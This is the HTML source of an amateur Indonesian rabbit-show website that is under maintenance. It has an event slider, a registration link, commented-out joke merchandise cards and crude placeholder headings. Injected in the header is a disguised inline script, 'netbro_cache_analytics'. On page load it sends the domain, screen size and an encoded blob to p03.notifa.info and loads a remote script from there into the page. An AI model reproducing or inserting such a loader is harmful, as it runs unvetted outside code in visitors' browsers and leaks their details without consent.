<html><head>  
	
<link rel="stylesheet" href="style.css"> 
<link rel="stylesheet" href="css/styleslider.css">
<link rel="stylesheet" href="css/responsive.css">
<link rel="stylesheet" href="css/owl.theme.css">   
<link rel="stylesheet" href="css/slicknav.css">  
<link rel="stylesheet" href="fonts/material-icon/css/material-design-iconic-font.min.css">	 
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css"> 
<meta name="viewport" content="width=device-width, initial-scale=1"><script src="js/scriptsfading.js"></script> 
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>



</head> 
<h1> 
MANGAN OPO CAK. . 
Haloooooow aswu
</h1>  
<body> 
<header>  
<div class="nav-bar">
<a class="btn-resp">
<span></span>
<span></span>
<span></span>
</a>
<!--
<nav> 
<ul> 
<div class="header">
<li><a href="#" class="nav-link">Home</a>		</li> 
<li><a href="#" class="nav-link">Events</a>		</li>	
<li><a href="#" class="nav-link">About</a>		</li> 
<li><a href="#" class="nav-link">Contacts</a>	</li> 
<li><a href="#" class="nav-link">Help</a>    	</li>
</div>
</ul>   
</nav> 	
-->
	
<!--	
<div class="header">
<a href="#" class="nav-link">Home</a>		
<a href="#" class="nav-link">Events</a>			
<a href="#" class="nav-link">About</a>		
<a href="#" class="nav-link">Contacts</a>	
<a href="#" class="nav-link">Help</a>    	
</div>
-->
	
<script type="text/javascript">

$(".btn-resp").on("click",function(){
  $('.header').toggleClass("show");
});


</script>
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2jhGQ6rnVlI8%2bO2h73fLn12qigRGj8wtQpAsHzs3nu0Zbg2%2fd0pTmVvz%2bPPyZ7eU%2fNsm3B3JLduDBxE8PcT%2fznFz8G5%2bre56UzD75pURKs6Xo5zjeZ3SB7p97i0LrjoPlImM1DIITZ61LJVwsOj%2fqliVdy1hsu7k1R0K327Ztl3%2flWNAFgZ2vQE6rn7ljHAqDqGdwaqrm%2f7VmOPEhWLIUY7Y366WT0W7stJ4L%2bLmHmiosDoGPcyUnE1N7HjU3kB64rt5JlKGT%2bYI%2fZEdV9ZIOz7GaG75M%2f4s%2bL6MtnBOJd7pUf37q8OqXHWafq9LORU1p4GUDDVzzpNBkgAwuTt%2bQeA7oKAU48Zo55RHVeTitqkETB%2b2kF%2fs2xno%2bH0CoS1LKu5JjLbaL9n2WGH7sG5zoTyorCxBL25z7xH8cpB5hvq65TZmhZgEs5decczOa4W5opHTd22as%2fxkhzSXWi1cPcq8qD%2bEk1oF1h2u4sh0Xc8zV8M8X7MLaOx2td5LeMGgRNGasCRWXPt3F5KSivBwyxtraOmE5%2fko17wcs36CKo%2fDcor6%2baQHQDs8w3uDQYipB2GDcWoYz5r0pDWS%2f9%2f90Xiz6BdNWpg9dAZOBmX8jrsD89QepDEJq7w%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
<!--  
	
<div class="gmbar"> 
	<img class="gmbr" src="image/head1.png" style="width:100%">
</div> 
-->
<!--	
<div class="w3-content w3-section" > 
<img class="mySlides w3-animate-fading" src="image/bg.jpg" style="width:100%"> 
<img class="mySlides w3-animate-fading" src="image/bg2.jpg" style="width:100%"> 	
<img class="mySlides w3-animate-fading" src="image/bg.jpg" style="width:100%"> 
<img class="mySlides w3-animate-fading" src="image/bg.jpg" style="width:100%"> 	
</div>	
--> 




</header> 
		
<div class="title"><h1>Rabbit Show MANUK TEMPLIK MELAR SEKALI</h1></div> 

<div class="main-body"> 
	
</div>
<div class="styleb"><h3 input="text">Website Under Maintenance! </h3></div> 
<!-- ---------------------------EVENT------------------------------------------------------------ -->
<div class="cont-eventnews"> 
<h2 input="text"> New Event </h2>

<img id="myImg" src="imagecontes/contes2.jpg" alt="Binangun Rabbits Contest 2" style="width:100%;max-width:500px">

<!-- The Modal -->
<div id="myModal" class="modal">
  <span class="close">&times;</span>
  <img class="modal-content" id="img01">
  <div id="caption"></div>
</div>
<script src="js/modalimage.js"></script>
 
<div class="button">
<a href="registration/index.html" class="btn">Register Now</a>
<!--<a href="#" class="btn">How To Register</a> -->
</div> 
</div> 
	

	
<div class="cont-event"> 
<h2 input="text"> Event</h2>	

	
<div class="slideshow-container">

<div class="mySlides fade">
  <div class="numbertext">1 / 3</div>
  <img src="imageslider/contes2.jpg" style="width:100%">
  <div class="text">News Events</div>
</div>

<div class="mySlides fade">
  <div class="numbertext">2 / 3</div>
  <img src="imageslider/contes1.jpg" style="width:100%">
  <div class="text">Caption Two</div>
</div>

	<!--
<div class="mySlides fade">
  <div class="numbertext">3 / 3</div>
  <img src="imageslider/" style="width:100%">
  <div class="text">Caption Three</div>
</div>
-->
<a class="prev" onclick="plusSlides(-1)">&#10094;</a>
<a class="next" onclick="plusSlides(1)">&#10095;</a>

</div>
<br>

<div style="text-align:center">
  <span class="dot" onclick="currentSlide(1)"></span> 
  <span class="dot" onclick="currentSlide(2)"></span> 
  <span class="dot" onclick="currentSlide(3)"></span> 
	</div>			
 </div>  
<script src="js/slider.js"></script>
	
<!-- -----------------------------------------------About----------------------------------------------- -->	
	
	<!--
<div class="cont-about"> 
<h2> Merchandise</h2>	
	<p> </p>
	<div class="grid-container"> 
		
  <div class="grid-item"><div class="card">
  <img src="merchn/giant.png" alt="Denim Jeans" style="width:100%">
  <h1>Mas Bayu no sensor</h1>
  <p class="price">Rp 5000</p>
  <p>dijual dengan daging berkualitas lembut selembut belahan semangka kalau dibelah</p>
  <p><button>Order Now</button></p>
</div> </div>
		
  <div class="grid-item"><div class="card">
  <img src="merchn/giant.png" alt="Denim Jeans" style="width:100%">
  <h1>Mas Bayu Sensor</h1>
  <p class="price">Rp 100</p>
  <p>Disensor Karena jijik katanya</p>
  <p><button>Order Now</button></p>
</div> </div>
  <div class="grid-item"><div class="card">
  <img src="merchn/giant.png" alt="Denim Jeans" style="width:100%">
  <h1>Mas Bayu dengan style melebar</h1>
  <p class="price">Rp 10.000</p>
  <p>Jual apa adanya lur harga nett</p>
  <p><button>Add to Cart</button></p>
</div> </div>  
		
		-->
		<!--
  <div class="grid-item"><div class="card">
  <img src="/w3images/jeans3.jpg" alt="Denim Jeans" style="width:100%">
  <h1>Tailored Jeans</h1>
  <p class="price">$19.99</p>
  <p>Some text about the jeans. Super slim and comfy lorem ipsum lorem jeansum. Lorem jeamsun denim lorem jeansum.</p>
  <p><button>Add to Cart</button></p>
</div> </div>
  <div class="grid-item"><div class="card">
  <img src="/w3images/jeans3.jpg" alt="Denim Jeans" style="width:100%">
  <h1>Tailored Jeans</h1>
  <p class="price">$19.99</p>
  <p>Some text about the jeans. Super slim and comfy lorem ipsum lorem jeansum. Lorem jeamsun denim lorem jeansum.</p>
  <p><button>Add to Cart</button></p>
</div> </div>
  <div class="grid-item"><div class="card">
  <img src="/w3images/jeans3.jpg" alt="Denim Jeans" style="width:100%">
  <h1>Tailored Jeans</h1>
  <p class="price">$19.99</p>
  <p>Some text about the jeans. Super slim and comfy lorem ipsum lorem jeansum. Lorem jeamsun denim lorem jeansum.</p>
  <p><button>Add to Cart</button></p>
</div> </div>  
		-->
		
		<!--
  <div class="grid-item"></div>
  <div class="grid-item">8</div>
  <div class="grid-item">9</div>  -->
</div>


</div> 
	
<div class="cont-contacts"> 
<h2> About</h2>	
	<p> "am stack developer, similar solo project maybe. as long time am make many apps, website building and maintenance. "</p>
</div> 	

	
	
	

</body> 
<footer> 
<!-- Footer Section Start -->
   
      <div class="footer-main">
       
          <!-- Footer Links -->

                  <ul class="ico">
                    
					  <li class="icons"><a class="footer-link" href="https://id-id.facebook.com/agi.priyambada"><i class="zmdi zmdi-facebook"><p>Facebook</p></i></a></li>
                    
					  <li class="icons"><a class="footer-link" href="https://www.instagram.com/agi.priy/"><i class="zmdi zmdi-instagram"><p>Instagram</p></i></a></li>
                    
					  <li class="icons"><a class="footer-link" href="#"><i class="zmdi zmdi-google-plus"><p>Google+</p></i></a></li>
                   
                    <!--<li class="linkedin"><a href="#"><i class=""></i></a></li>
                    <li class="dribbble"><a href="#"><i class=""></i></a></li>
                -->  
				</ul>
            </div>
			
            <div class="copyright">
              <p class="text-copyright">All copyrights reserved &copy; 2019 - Designed & Developed by <a rel="nofollow" href="">Agieee</a></p>
            </div>

    

    <!-- Footer Section End --> 
</footer>
</html>